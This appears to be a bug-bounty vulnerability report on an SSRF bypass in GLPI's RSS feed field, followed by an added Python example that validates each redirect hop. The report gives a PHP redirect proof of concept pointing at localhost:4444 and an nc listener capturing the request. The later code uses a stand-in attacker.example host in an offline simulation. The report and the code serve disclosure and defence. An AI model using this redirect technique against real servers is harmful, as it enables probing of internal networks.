SSRF in feeds in glpi-project/glpi
Reported on
Oct 2nd 2022
Description
By looking at this URL: https://github.com/glpi-project/glpi/security/advisories/GHSA-rqgx-gqhp-x8vv, I understand that an SSRF was possible in the URL of the RSS feed, and in fact this has been fixed.
However, I found a bypass to CVE-2022-36112.
Proof of Concept
To trigger the bug, set up a PHP server on a remote machine with a file index.php containing this code:
<?php
header("Location: http://localhost:4444");
?>
Then, on the server where GLPI is running, start a listener on port 4444.
In the RSS feed URL field, enter "http://<your server>/index.php" and hit enter.
You will see that, on port 4444, this request is received:
user@vm:/var/www/glpi$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 127.0.0.1 59222
GET / HTTP/1.1
Host: localhost:4444
User-Agent: SimplePie/1.5.8 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20211224025350
Accept-Encoding: deflate, gzip, br
Referer: http://localhost:4444/
Accept: application/atom+xml, application/rss+xml, application/rdf+xml;q=0.9, application/xml;q=0.8, text/xml;q=0.8, text/html;q=0.7, unknown/unknown;q=0.1, application/unknown;q=0.1, */*;q=0.1
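Added example (not from the report or the GLPI project): the request above shows the feed parser following the 302 from the remote host to 127.0.0.1, so a check applied only to the URL the user submits is bypassed by the redirect. The Python below, written for this page, validates the host of every hop against non-public address ranges and follows redirects manually instead of letting the HTTP client do it. The host names, addresses and responses in the simulation are constructed to reproduce the chain in the report and never touch the network.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

MAX_REDIRECTS = 5
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def default_resolver(host):
    """Resolve a host name to every address it maps to (A and AAAA records)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_ip(ip):
    """True only for globally routable unicast addresses: loopback, RFC 1918,
    link-local, multicast and similar ranges are all rejected."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def check_url(url, resolver=default_resolver):
    """Reject anything that is not plain http(s) or whose host resolves to a
    non-public address. Returns the parsed URL, raises ValueError otherwise."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if not parsed.hostname:
        raise ValueError("URL has no host")
    addresses = resolver(parsed.hostname)
    if not addresses:
        raise ValueError(f"host does not resolve: {parsed.hostname}")
    for ip in addresses:
        if not is_public_ip(ip):
            raise ValueError(f"{parsed.hostname} resolves to non-public address {ip}")
    return parsed


def fetch_feed(url, fetch, resolver=default_resolver):
    """Fetch a feed while validating EVERY hop of a redirect chain.

    fetch(url) must perform a single request with automatic redirects disabled
    and return (status, headers, body), with headers keyed in lowercase.
    Returns (final_url, body); raises ValueError on a rejected hop or a loop."""
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        check_url(current, resolver)   # the submitted URL AND each Location target
        status, headers, body = fetch(current)
        if status in REDIRECT_STATUSES and "location" in headers:
            current = urljoin(current, headers["location"])  # relative Location allowed
            continue
        return current, body
    raise ValueError("too many redirects")


# --- Constructed simulation of the chain in the report; no network is used. ---
CONSTRUCTED_DNS = {
    "attacker.example": ["93.184.216.35"],   # constructed: the remote PHP host
    "rss.example": ["93.184.216.34"],        # constructed: a legitimate feed host
    "localhost": ["127.0.0.1"],
}


def constructed_resolver(host):
    return CONSTRUCTED_DNS.get(host, [])


def constructed_fetch(url):
    """Stand-in for one HTTP request; mirrors the Location header of index.php above."""
    responses = {
        "http://attacker.example/index.php": (302, {"location": "http://localhost:4444"}, b""),
        "http://localhost:4444": (200, {}, b"internal service on the GLPI host"),
        "http://rss.example/feed": (301, {"location": "/feed.xml"}, b""),
        "http://rss.example/feed.xml": (200, {}, b"<rss/>"),
        "http://rss.example/loop": (302, {"location": "/loop"}, b""),
    }
    return responses[url]


def reported_chain():
    """Return the rejection reason for the report's URL, or None if it was fetched."""
    try:
        fetch_feed("http://attacker.example/index.php", constructed_fetch, constructed_resolver)
    except ValueError as err:
        return str(err)
    return None


if __name__ == "__main__":
    # Checking only the submitted URL passes: that is exactly what the bypass relies on.
    print("submitted URL alone:", check_url("http://attacker.example/index.php", constructed_resolver).hostname)
    print("per-hop validation:", reported_chain())
    print("legitimate feed:", fetch_feed("http://rss.example/feed", constructed_fetch, constructed_resolver))
```

Running the file shows the first check accepting attacker.example while the per-hop check stops at the redirect to 127.0.0.1. One caveat for a real client: the address is validated at resolution time but the HTTP library resolves again when it connects, so a host whose DNS answer changes between the two lookups can still slip through; a production fetcher pins the connection to the address it validated.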
Impact
This vulnerability can be used by a remote attacker to discover the internal network of the machine running GLPI.
https://github.com/glpi-project/glpi/security/advisories/GHSA-8vwg-7x42-7v6p